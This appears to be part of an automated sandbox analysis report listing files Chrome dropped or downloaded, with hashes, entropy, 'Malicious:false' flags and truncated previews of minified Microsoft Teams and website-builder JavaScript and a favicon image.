                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-dataAids-dc689f22.js",["exports"],(function(E){"use strict";var R=(global.keyMirror||guac.keymirror)({BACKGROUND_IMAGE_RENDERED:null,HAMBURGER_MENU_LINK:null,HEADER_WIDGET:null,HEADER_SECTION:null,HEADER_VIDEO:null,HEADER_VIDEO_EMBED_WRAPPER:null,HEADER_VIDEO_EMBED:null,HEADER_VIDEO_EMBED_INSET_POSTER:null,HEADER_VIDEO_EMBED_FILL_POSTER:null,HEADER_VIDEO_BACKGROUND:null,HEADER_VIDEO_FILL_POSTER:null,HEADER_SLIDESHOW:null,HEADER_SLIDE:null,HEADER_HERO_SLIDE:null,HEADER_PHONE_RENDERED:null,HEADER_PIPE_RENDERED:null,HEADER_ADDRESS_RENDERED:null,HEADER_LOGO_RENDERED:null,HEADER_LOGO_IMAGE_RENDERED:null,HEADER_LOGO_OVERHANG_CONTAINER:null,HEADER_LOGO_TEXT_RENDERED:null,HEADER_TAGLINE_RENDERED:null,HEADER_TAGLINE2_RENDERED:null,HEADER_NAV_RENDERED:null,HEADER_CTA_BTN:null,CART_ICON_RENDER:null,CART_ICON_COUNT:null,CART_ICON_PIPE:null,CART_TEXT:null,CART_DROPDOWN_RENDERED:null,SEARCH_FORM_RENDERED:null,SEARCH_ICON_RENDERED:null,SEARCH_ICON_RENDERED_OPEN:null,SEARCH
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (57138)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):57246
                                                                                                                                                                                                                          Entropy (8bit):5.5255246496960755
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:lIbmwkZtyPYFu7OQwVfAXdhZm8WYwV7/Lohypjw3LzMjHezVZPHO9/LxNkaMSNHv:lcmwkCFI8W7xoMpszU/eAh+RwrE5lG
                                                                                                                                                                                                                          MD5:0A6903B0C0DCC547CA7FA6AFEC635D78
                                                                                                                                                                                                                          SHA1:D63E014794AC8D7BEDEA72C6FEDA13FBD08E989B
                                                                                                                                                                                                                          SHA-256:1494A9B97D2E7F5DE852399FEE596954A438792BAFBA1480CCA60F45FF293177
                                                                                                                                                                                                                          SHA-512:7C07F4C0815C694E8C62D799A60EA0E9ABFBE488A08EB8F48C7AE4CF5C0D26A1839D3747497E2A4474860191F6C6213110799568B37AE48D7EF998A91957CA5B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[336776],{911717:(e,t,n)=>{"use strict";n.d(t,{w:()=>a});var r=n(783148);class a{constructor(e,t){this.value=e,this.piiKind=t}static isPIIValue(e){return!!e&&"string"!=typeof e&&void 0!==e.scrub}scrub(){return(0,r.sha256)(JSON.stringify(this.value))}}},276201:(e,t,n)=>{"use strict";n.d(t,{$:()=>a});var r=n(34655);function a(e){if(!e||"object"!=typeof e)return!1;if("RegionGtmNotFoundInRespone"===e.errorCode)return!0;const t=e;return t.code===r.O4.InvalidResponse&&"Discover"===t.context&&"regionGtm"===t.subContext}},396949:(e,t,n)=>{"use strict";var r,a;n.d(t,{I:()=>r}),function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (53670)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):53798
                                                                                                                                                                                                                          Entropy (8bit):5.230039416671407
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:S+yEFdQ+a4BitfPsk2lvRCkl67sCtbK6xYSZdj6qYMvnshwdWeMg3r:1dsFsk2lLc1Zb
                                                                                                                                                                                                                          MD5:4305A98733CD8A3B3F365BDEEECF0249
                                                                                                                                                                                                                          SHA1:D62D1C89267292689AD19BAF36141BD68505FABF
                                                                                                                                                                                                                          SHA-256:5475C34EA8E2478D7C44EF365C2F476DC80C26DDEA2099A13006AD383F35A523
                                                                                                                                                                                                                          SHA-512:65FA7A5E8DE9BF97FC0E366E768B877C2F9A85D5780ED18341B6AF878D5E9B0DDAE058F58A0291C731A9492FEA40DB463B22952D1B2D0B71E9DF0A1DC228AB0D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/420340-fadd8cd32aedf874.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[420340],{944244:e=>{"use strict";var t=function(e){return function(e){return!!e&&"object"==typeof e}(e)&&!function(e){var t=Object.prototype.toString.call(e);return"[object RegExp]"===t||"[object Date]"===t||function(e){return e.$$typeof===s}(e)}(e)};var s="function"==typeof Symbol&&Symbol.for?Symbol.for("react.element"):60103;function r(e,t){return!1!==t.clone&&t.isMergeableObject(e)?a((s=e,Array.isArray(s)?[]:{}),e,t):e;var s}function i(e,t,s){return e.concat(t).map((function(e){return r(e,s)}))}function n(e){return Object.keys(e).concat(function(e){return Object.getOwnPropertySymbols?Object.getOwnPropertySymbols(e).filter((function(t){return Object.propertyIsEnumerable.call(e,t)})):[]}(e))}function o(e,t){try{return t in e}catch(e){return!1}}function l(e,t,s){var i={};return s.isMergeableObject(e)&&n(e).forEach((function(t){i[t]=r(e[t],s)})),n(t).forEach((function(n){(function(e,t){ret
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65520), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):925217
                                                                                                                                                                                                                          Entropy (8bit):4.809605448502386
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24576:BqNYbMWak+KyPAKHRlqrf+wSKecnXAysI+i:oNfPP7qrf+wSKekAyp+i
                                                                                                                                                                                                                          MD5:06DCD866E3D5E1BDB5D909DD66A35EFA
                                                                                                                                                                                                                          SHA1:2F10EAA3209833AB5282B72F6FCD0179F167F99A
                                                                                                                                                                                                                          SHA-256:A4764454921C61F33141EC5A149B7FFB9EAA9F13F3BE64C79C3FD0F438170235
                                                                                                                                                                                                                          SHA-512:B20FDE9375483F567C9B91A1F91730A8360135E98247DD42B3392CD7FEE539D206EB060B61BA6EFF737A50849D0932180A9699237C12196D6641134CCCB8B311
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/main-locale-en-us-82dc95ddf9f2139f.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[531106],{592150:(e,t,a)=>{a.r(t),a.d(t,{default:()=>o});const o={namespace:"activity",locale:"en-us",translations:{activity_app_name:"Activity",activity_contextual_settings_undo_button:"Undo",activity_esp_chat_recommendation_description:"Start a chat with a coworker or bring everyone together in a group chat",activity_esp_chat_recommendation_title:"Stay in touch using chat",activity_esp_contact_sync_confirmation_description:"Talk to anyone from your contact list.",activity_esp_contact_sync_confirmation_title:"Google contacts synced",activity_esp_files_recommendation_description:"Share all types of files like PDFs, documents or photos",activity_esp_files_recommendation_title:"Share and collaborate on files in chat",activity_esp_meeting_recommendation_description:"Try out meeting backgrounds, reactions, and more",activity_esp_meeting_recommendation_title:"Meet now or later",act
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33000)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):33108
                                                                                                                                                                                                                          Entropy (8bit):5.412771564965738
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:t3njFfVkZBauR0Rke9v54B+jjkasi6juRYb0AKnOU1ovzywyu3CMMRtw2L6HNPjE:28uR0RkeMjuRYb0AKnOU1ovzywyptw2b
                                                                                                                                                                                                                          MD5:151E852AC972E6EB3FF7F799813CACFE
                                                                                                                                                                                                                          SHA1:730FE4CC00AF6B36026AFC895C0055EB2FC20F98
                                                                                                                                                                                                                          SHA-256:E066550039057E9E563F40FA2D1856088F49274A34E586565D56A573690F1B5C
                                                                                                                                                                                                                          SHA-512:2D37C4E3403E06D6062E9783C9A2AEDE3F106ECFD6192F23F1F4AF05C17F51767838A1D894BD7E7D1261D52A2B339B0D1A288CE1978D280A2BB67F6D0EE557C1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[669152],{380015:(r,e,o)=>{o.d(e,{h:()=>l,m:()=>u});var a=o(594900),t=o(649380),d=o(197609);const n=t.TQ.reduce(((r,e)=>{const o=e.slice(0,1).toUpperCase()+e.slice(1),t={[`colorPalette${o}Background1`]:a.yd[e].shade40,[`colorPalette${o}Background2`]:a.yd[e].shade30,[`colorPalette${o}Background3`]:a.yd[e].primary,[`colorPalette${o}Foreground1`]:a.yd[e].tint30,[`colorPalette${o}Foreground2`]:a.yd[e].tint40,[`colorPalette${o}Foreground3`]:a.yd[e].tint20,[`colorPalette${o}BorderActive`]:a.yd[e].tint30,[`colorPalette${o}Border1`]:a.yd[e].primary,[`colorPalette${o}Border2`]:a.yd[e].tint20};return Object.assign(r,t)}),{});n.colorPaletteRedForeground3=a.yd.red.tint30,n.colorPaletteRedBorder2=a.yd.red.tint30,n.colorPaletteGreenForeground3=a.yd.green.tint40,n.colorPaletteGreenBorder2=a.yd.green.tint40,n.colorPaletteDarkOrangeForeground3=a.yd.darkOrange.tint30,n.colorPaletteDarkOrangeBor
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1432)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1540
                                                                                                                                                                                                                          Entropy (8bit):5.000460293458999
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38vGvrwybSH4oxGsKsR/SUnH8PZvLOW4Tao8XhdqkrSO7yyjIzgYb0:wp3sp39vE1TgtSvyIzp0
                                                                                                                                                                                                                          MD5:896D419D1C1A474F2985AE19A11E43AF
                                                                                                                                                                                                                          SHA1:DCC73A06352D2FF9B1358082DEDFD3B905448063
                                                                                                                                                                                                                          SHA-256:9F191C3167D50BFFD4CD6F68EB2D63B124E99C08AF7381069952BAC9E7C4A19C
                                                                                                                                                                                                                          SHA-512:4A81C80710B63C81D6EDF35CD3B26B4C4B8C87D2F3C45C88D4ADB3CC6B0B8A26EB543219399CC6D1A949983AF55FC54AD1D687883ED9DFF1AA849F632FDF3A14
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/416397-1c547cab2265aa75.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[416397],{416397:(e,a,t)=>{t.d(a,{Z:()=>r});var C=t(513432),s=t(395225),l=t.n(s),c=t(485529),n=t(829289),r=(0,c.Ke)({svg:function(e){var a=e.classes;return C.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svg},C.createElement("path",{className:l()(n.Q.filled,a.filledPart),d:"M6.75 10C6.75 10.9665 5.9665 11.75 5 11.75C4.0335 11.75 3.25 10.9665 3.25 10C3.25 9.0335 4.0335 8.25 5 8.25C5.9665 8.25 6.75 9.0335 6.75 10ZM11.75 10C11.75 10.9665 10.9665 11.75 10 11.75C9.0335 11.75 8.25 10.9665 8.25 10C8.25 9.0335 9.0335 8.25 10 8.25C10.9665 8.25 11.75 9.0335 11.75 10ZM15 11.75C15.9665 11.75 16.75 10.9665 16.75 10C16.75 9.0335 15.9665 8.25 15 8.25C14.0335 8.25 13.25 9.0335 13.25 10C13.25 10.9665 14.0335 11.75 15 11.75Z"}),C.createElement("path",{className:l()(n.Q.outline,a.outlinePart),d:"M6.25 10C6.25 10.6904 5.69036 11.25 5 11.25C4.30964 11.2
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (27783)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):27891
                                                                                                                                                                                                                          Entropy (8bit):5.439202906104346
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:gSSqn2uZfveZqHvxFdqfGNSPTRzotoNGMT5tT5GiYlWT5KT5TbVcUWA9h5D1rRyX:tf+OxtoskfFQLfrs
                                                                                                                                                                                                                          MD5:F1AA9D0B9892214B52C3AC52DF2C0DE7
                                                                                                                                                                                                                          SHA1:1E3E28897A2F8078CB3300D1CCA46B514BC0B2A9
                                                                                                                                                                                                                          SHA-256:B62E880D4D12C0CAD366CC04D9B81E6E1CAC198C00829C3AADF94634D2449368
                                                                                                                                                                                                                          SHA-512:BBCC11664D863D5992D5863FCA04BFB26C0ED5AB9AF7D6C1ED28ECBA6FA27C20DCC633DFFC5A593878A6190D154498CA28A2F05E70E4DD377A2111B947FC6A9F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[417548],{485202:(t,e)=>{"use strict";e.byteLength=function(t){var e=s(t),r=e[0],n=e[1];return 3*(r+n)/4-n},e.toByteArray=function(t){var e,r,i=s(t),f=i[0],u=i[1],h=new o(function(t,e,r){return 3*(e+r)/4-r}(0,f,u)),a=0,c=u>0?f-4:f;for(r=0;r<c;r+=4)e=n[t.charCodeAt(r)]<<18|n[t.charCodeAt(r+1)]<<12|n[t.charCodeAt(r+2)]<<6|n[t.charCodeAt(r+3)],h[a++]=e>>16&255,h[a++]=e>>8&255,h[a++]=255&e;2===u&&(e=n[t.charCodeAt(r)]<<2|n[t.charCodeAt(r+1)]>>4,h[a++]=255&e);1===u&&(e=n[t.charCodeAt(r)]<<10|n[t.charCodeAt(r+1)]<<4|n[t.charCodeAt(r+2)]>>2,h[a++]=e>>8&255,h[a++]=255&e);return h},e.fromByteArray=function(t){for(var e,n=t.length,o=n%3,i=[],f=16383,s=0,h=n-o;s<h;s+=f)i.push(u(t,s,s+f>h?h:s+f));1===o?(e=t[n-1],i.push(r[e>>2]+r[e<<4&63]+"==")):2===o&&(e=(t[n-2]<<8)+t[n-1],i.push(r[e>>10]+r[e>>4&63]+r[e<<2&63]+"="));return i.join("")};for(var r=[],n=[],o="undefined"!=typeof Uint8Array?Uint8Array:Array
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):412
                                                                                                                                                                                                                          Entropy (8bit):5.483625893120041
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:fZOoPOrKGI5YDHm/IrzqeCnTNKl/vtAgWjEPltls+4JeSEHj+iq0q5/jygP+k4q9:ESOXI5YjIE4E9tA0Pb3SkEl9q
                                                                                                                                                                                                                          MD5:5DD6CE63F6AB4419F6389A4E20642497
                                                                                                                                                                                                                          SHA1:DC60AD2AABCE1D57CA8A1A9968023EE38394936F
                                                                                                                                                                                                                          SHA-256:5B9215247EEFA1AA3E7233BDA8C3144F99CFEB5C2A8A2053DA7A59ACCCDEE501
                                                                                                                                                                                                                          SHA-512:983256A81344F03F3B1C921D720ED00C4BF0A93510E9DB868F490A703C4BD14E53649E741EA0C0211D0AC97C81CE81403B0B1FFDEF8AA3EA5F694D38A1C3446B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:"https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:64,h:64,m"
                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............VP8 .........*....>i*.E.".....@....X.i.... .,.$.h..=..*........F....:.......kH.7.S9.G.[-..........7.....q.............;...g.r../..6.c.(.......w...Zif.%{P{.P.......U.....N.N.pE...^.X.EXIF....Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100........................................
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5155)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):5263
                                                                                                                                                                                                                          Entropy (8bit):5.151157042119288
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:ThGNjzj4jiRGi3wGNiU2BuPRELEYQncbQlyGJO/s4fFWVqXsJsLsGDs+1sarbHJS:9GNjzj4jiRGi3wGNi+PRELEYQcb9G6fc
                                                                                                                                                                                                                          MD5:FC497DFB2A08F21B1A7D8866B7638247
                                                                                                                                                                                                                          SHA1:8E1D63D4885BA36E77B9BF0E149E862830DF07BB
                                                                                                                                                                                                                          SHA-256:BBCEDE435B654241D9980D457BC579FB4949EF3CEA216FC87DBE87CDF99CEB20
                                                                                                                                                                                                                          SHA-512:CF04997AC8CD1E64F10013B04A20A4DC41B79FD90F00CBF5783A7802BF3DEBB8F726F83ADB65EA03E581F285121FC6A943D4FF932EA6EEB0DE036FDD6D854C99
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/711005-dcc14d48e317723d.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[711005,933386],{845155:e=>{e.exports=function(e,n,t,r,o,i,u,a){if(!e){var s;if(void 0===n)s=new Error("Minified exception occurred; use the non-minified dev environment for the full error message and additional helpful warnings.");else{var c=[t,r,o,i,u,a],v=0;(s=new Error(n.replace(/%s/g,(function(){return c[v++]})))).name="Invariant Violation"}throw s.framesToPop=1,s}}},711005:(e,n,t)=>{t.r(n),t.d(n,{NovaCentralizedCommandingProvider:()=>s,NovaEventingInterceptor:()=>y,NovaEventingProvider:()=>E,NovaGraphQLProvider:()=>R,graphql:()=>G,mapEventMetadata:()=>k,useFragment:()=>M,useLazyLoadQuery:()=>L,useMutation:()=>_,useNovaCentralizedCommanding:()=>c,useNovaEventing:()=>b,useNovaGraphQL:()=>z,useNovaUnmountEventing:()=>N,usePaginationFragment:()=>S,useRefetchableFragment:()=>F,useSubscription:()=>Q});var r=t(513432),o=t.n(r),i=t(845155),u=t.n(i),a=o().createContext(null),s=({
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):129495
                                                                                                                                                                                                                          Entropy (8bit):5.264148032458579
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:nvIDpltjnNK4MKEs6iifxAmrQ76GBtBkQjyMAz8f:ngS46MBkQio
                                                                                                                                                                                                                          MD5:3C93003ED2005FC512F13D8296A28B2E
                                                                                                                                                                                                                          SHA1:E080952C0FCDD6DC9136537D89C57B78E38512AF
                                                                                                                                                                                                                          SHA-256:3131BF1591179C74E8D2020D73EB09742CA931075C3EA7BA5AFEFC4D76400814
                                                                                                                                                                                                                          SHA-512:34E6940C6D7BF5F84B614499AAD8C60744ED2F8F8496603180B2BA419D7C6849B35E8DE80D0CD5E01AD83A42D20EA378DB85FD6A6398D69CD24C6D6EC6B0868F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/638637-20856706a13e593e.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[638637],{323707:(e,n,t)=>{var r=t(513432),l=t(253070);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var u=new Set,o={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(o[e]=n,e=0;e<n.length;e++)u.add(n[e])}var c=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):3895900
                                                                                                                                                                                                                          Entropy (8bit):5.39232794493168
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:49152:GhoKeEA9gApAiHarj7wgx1k4pwFe0w4F2juOdHIYu5XTJUwguj1iTmFAnhKc7tkW:kFeG
                                                                                                                                                                                                                          MD5:39F0C9B578D2A20F9B62E5DF5A224332
                                                                                                                                                                                                                          SHA1:5BCD8E1E0B7D7259BB0FECC2228E2318DCA99AC5
                                                                                                                                                                                                                          SHA-256:96E8E1CDB27ACAD1F09E2F105B2BBA6ED711417599F8622754F3BC28D49B389E
                                                                                                                                                                                                                          SHA-512:DED6A03B3378269B7E4A2AF980CA7F5DE4E403721570EF3A975EB82CCFE5E3A98716A2F6AF0702F1490816A5D2FF94B6AED4ACAB0F0DEC87F1499D1858BF1F44
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805610],{211014:(e,t,n)=>{"use strict";n.d(t,{b:()=>i});const i=(0,n(965804).O)({isStudentAvatar:{Bf4jedk:"f1ohpo60"},isParentAvatar:{Bf4jedk:"ff9fk16"}})},516404:(e,t,n)=>{"use strict";function i(e){return'<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>','<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>'}n.d(t,{A:()=>i})},10247:(e,t,n)=>{"use strict";function i(e){var t="";Array.prototype.join;return t+="<style>\n .preload-title-bar-trim {\n ","mac"===e.osPlatform?t+="\n --preload-title-bar-background-color: rgb(98, 100, 167);\n ":t+="\n --preload-title-bar-background-color: rgb(70, 71, 117);\n ",t+='\n\n background-color: var(--preload-title-bar-bac
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):488546
                                                                                                                                                                                                                          Entropy (8bit):5.627318568051973
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:i/JNz8JPeINQKxlLdgK5EkZyTdTIxVhl3qaMZZ2H+LLIIHW0F:45KCkZ7r3qaMZZ2H+LLIIHn
                                                                                                                                                                                                                          MD5:59CB1B0DCFFAFDC09EDB8D088D756A86
                                                                                                                                                                                                                          SHA1:0DD58AA9FEBAACE29839418E4D5D8C12FBE253DB
                                                                                                                                                                                                                          SHA-256:52C61243F0C75D908D691EEF58E6DFB3FA49D6A19F02040C20DB452D98E3676D
                                                                                                                                                                                                                          SHA-512:FC6584D069EA5D4D412F2E5C95BA72D51D669F5CF99E6EB9AC74CC2E0A2EAA0F95CDBC9C704E8A5548D421B1702B51BDE3938950046701CA6E8D387004EFB186
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/libphonenumber-bundle-d6c9245b72d57bc2.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725236],{744465:(module,__unused_webpack_exports,__webpack_require__)=>{var f;f=function(){var define,module,exports;return function e(o,t,r){function n(i,a){if(!t[i]){if(!o[i]){if(d)return d(i,!0);var g=new Error("Cannot find module '"+i+"'");throw g.code="MODULE_NOT_FOUND",g}var s=t[i]={exports:{}};o[i][0].call(s.exports,(function(e){return n(o[i][1][e]||e)}),s,s.exports,e,o,t,r)}return t[i].exports}for(var d=void 0,i=0;i<r.length;i++)n(r[i]);return n}({1:[function(require,module,exports){(function(global){(function(){var $jscomp=$jscomp||{};$jscomp.scope={},$jscomp.createTemplateTagFirstArg=function(e){return e.raw=e},$jscomp.createTemplateTagFirstArgWithRaw=function(e,o){return e.raw=o,e},$jscomp.arrayIteratorImpl=function(e){var o=0;return function(){return o<e.length?{done:!1,value:e[o++]}:{done:!0}}},$jscomp.arrayIterator=function(e){return{next:$jscomp.arrayIteratorImpl(e)}},$jsco
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (966)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1022
                                                                                                                                                                                                                          Entropy (8bit):5.168862244232466
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:RMRGBLEdPSvkD9Veh/Js8FZdVpbWkm5nSHrImMRr:RQw41SvkD9CFKkanOrImQr
                                                                                                                                                                                                                          MD5:352FFAB43E1CEC3BB949809E347B423B
                                                                                                                                                                                                                          SHA1:F08547F3BC7D5D8C8FA6F058DFFE5D68AA42E943
                                                                                                                                                                                                                          SHA-256:E2AA142D9E27BD75B23BB0827CEDB6E05CCDD2AD42C9ACC1D4597B2DD4093EB5
                                                                                                                                                                                                                          SHA-512:3E1464D4F7E36C88541B6BBFACA373EEF66E5057346C113D1A0858452191296B380DCFBF211514203DFC5F75FCD302D7B35122E2FA21BBEC490A77D556A99069
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/dynamicFontScaler-ecd443bf.js",["exports"],(function(e){"use strict";const t={wordWrap:"normal !important",overflowWrap:"normal !important",display:"none",visibility:"hidden",position:"absolute",width:"auto",overflow:"visible",left:0};e.d=function(e){let{text:a,containerId:n,font:o,fontSizes:i,style:r,Tag:l=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Element,typography:c,targetId:d,maxLines:s=3,prioritizeDefault:g}=e;const p={containerId:n,targetId:d,fontSizes:i,maxLines:s,prioritizeDefault:g};return{element:(global.React||guac.react).createElement((global.React||guac.react).Fragment,null,i.map((e=>(global.React||guac.react).createElement(l,{tag:"span",key:e,font:o,style:{...r,...t,fontSize:e},"data-size":e,"data-scaler-id":`scaler-${n}`,typography:c,"data-ux":"scaler","aria-hidden":!0},a)))),scriptProps:p,callback:()=>window.wsb.DynamicFontScaler(p)}}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=dynamicFontS
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (57138)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):57246
                                                                                                                                                                                                                          Entropy (8bit):5.5255246496960755
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:lIbmwkZtyPYFu7OQwVfAXdhZm8WYwV7/Lohypjw3LzMjHezVZPHO9/LxNkaMSNHv:lcmwkCFI8W7xoMpszU/eAh+RwrE5lG
